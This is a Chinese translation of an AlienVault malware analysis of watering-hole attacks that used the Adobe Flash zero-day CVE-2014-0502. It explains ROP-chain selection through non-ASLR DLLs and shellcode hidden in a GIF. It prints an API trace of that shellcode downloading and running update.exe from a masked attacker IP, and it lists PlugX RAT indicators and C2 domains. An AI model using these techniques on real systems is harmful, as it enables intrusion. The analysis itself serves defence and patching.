对利用Adobe 0day – CVE-2014-0502进行攻击的行为分析


发布人:admin分类:网络安全浏览量:30发布时间:2017-12-12

前些天FireEye发布了一个利用AdobeFlash的新0day进行攻击的报告,且Adobe已经根据漏洞情况发布了一个安全更新。

根据FireEye的报告,许多网站会将访问者重定向到以下包含exploit的恶意服务器:

Peterson Institute for InternationalEconomics
American Research Center in Egypt
Smith Richardson Foundation

恶意Flash文件位于http://4.59.XXX.XX/common/cc.swf

该Flash包含一些有趣的debug symbols:

C:\Users07\Desktop\FlashExp(ie)\src\cc.as

Flash文件中的ActionScript代码用来确定操作系统版本以及选择硬编码的ROP chains来绕过ASLR。

如果是Windows XP系统,代码会先检查系统语言,对于以下两种语言的系统,则只包含ROP chains:

英文
中文

在这种情况下(Windows XP系统),ROP chain使用一种众所周知的技术从msvcrt.dll中提取编译。

如果系统运行的是Windows 7:

 - 检查系统是否安装了Java 1.6或Java 1.7。

 - 如果安装了Java1.6,代码使用Java 1.6中自带的msvcr71.dll中的ROP chain,该dll文件没有ASLR保护。 

 - 检查系统是否安装了Microsoft Office 2007或2010

 - 如果安装了,则使用Microsoft Office 2007/2010中自带的hxdl.dll中的ROP chain,该dll没有ASLR保护。

要加载hxds.dll,需要使用一种在这种类型的exploits中很常见的协议处理器location.href = 'ms-help:'

ActionScript代码同时负责下载一个GIF文件:

下载的文件如下图所示,看起来是个正常的图片:

但该图片在位于偏移3344的地方包含一个shellcode,该shellcode会从同一服务器下载并执行一个PE32文件:

利用图片执行shellcode是一个聪明的做法,因为这样可以绕过很多网络安全产品的监控。

该shellcode通过利用以下函数来下载并执行PE32文件:

    LoadLibraryA(wininet)
    LoadLibraryA(user32)
    VirtualProtect(adr=404bf1, sz=4,flags=40)
    SetUnhandledExceptionFilter(0)
    VirtualProtect(adr=7c81cdda, sz=82,flags=40)
    VirtualProtect(adr=7c81cdda, sz=82,flags=0)
    SetUnhandledExceptionFilter(7c81cdda)
    GetTempPath(len=104, buf=12fca4) = 14
   GetTempFileName(path=C:\users\jaime\Temp\, prefix=0, unique=0,buf=12fca4) = 245D
     Path = C:\users\jaime\Temp\245d.tmp
    InternetOpenA()
   InternetOpenUrlA(http://4.59.XX.XX/common/update.exe)
   CreateFileA(C:\users\jaime\Temp\245d.tmp) = 4
    InternetReadFile(1, buf: 12fbe8, size:64)
    InternetCloseHandle(1) = 1
    InternetCloseHandle(1) = 1
    CloseHandle(4)

本次攻击中所用的payload是一个不怎么出名的远控程序PlugX RAT,我之前的博客中提到过它几次:

Tracking down the author of the PlugX RAT 

The connection between the Plugx Chinese gang and the latestInternet Explorer Zeroday

New versions of the IExplorer ZeroDay emerge targeting Defence andIndustrial companies

恶意程序会将它自己拷贝到\AllUsers\DRM\RasTls\RasTls.exe,并在执行过程中创建以下互斥文件:

\BaseNamedObjects\Global\dklw
\BaseNamedObjects\Global\cso
\BaseNamedObjects\Global\qemyqvmyhiy
\BaseNamedObjects\Global\eriwjjo
\BaseNamedObjects\Global\etniisebehheq
\BaseNamedObjects\Global\beetxado
\BaseNamedObjects\Global\zhyzrjduosfptunf
\BaseNamedObjects\Global\zzusnnzeqgzupeto
\BaseNamedObjects\Global\onwmkwazrynpn
\BaseNamedObjects\Global\nmtg
\BaseNamedObjects\Global\helbibkzhruo
\BaseNamedObjects\Global\opylrvflplgad
\BaseNamedObjects\Global\zgjawrojchcfavnh
\BaseNamedObjects\Global\gmd
\BaseNamedObjects\Global\svdwr
\BaseNamedObjects\Global\unbdehrrxgqujyazj
\BaseNamedObjects\Global\qpl
\BaseNamedObjects\Global\ihnwguwceofkhcv
\BaseNamedObjects\Global\kvxieoc
\BaseNamedObjects\My_Name_horse(Svchost)

同时将自身注入到svchost进程中。

PlugX包含三种不同的命令和控制方式:

00903474 -> java[.]ns1[.]name
009034B8 -> adservice[.[no-ip[.]org
009034FC -> wmi[.]ns01[.]us

并通过HTTP与C&C交互:

注意下图中指定的C&C域名是恶意构造的:

至此,不用我提醒你也会尽快更新Adobe和包含漏洞、可以被用来绕过ASLR的Java和Office版本了吧。

祝玩得愉快!

[译自 alienvault]


被黑站点统计 - 文章版权1、本主题所有言论和图片纯属会员个人意见,与本文章立场无关
2、本站所有主题由该文章作者发表,该文章作者与被黑站点统计享有文章相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该文章作者和被黑站点统计的同意
4、文章作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
7、被黑站点统计管理员有权不事先通知发贴者而删除本文

免责声明

本站主要通过网络搜集国内被黑网站信息,统计分析数据,为部署安全型网络提供强有力的依据.本站所有工作人员均不参与黑站,挂马或赢利性行为,所有数据均为网民提供,提交者不一定是黑站人,所有提交采取不记名,先提交先审核的方式,如有任何疑问请及时与我们联系.

admin  的文章


微信公众号

微信公众号


Copyright © 2012-2022被黑网站统计系统All Rights Reserved
页面总访问量:21397553(PV) 页面执行时间:72.294(MS)
  • xml
  • 网站地图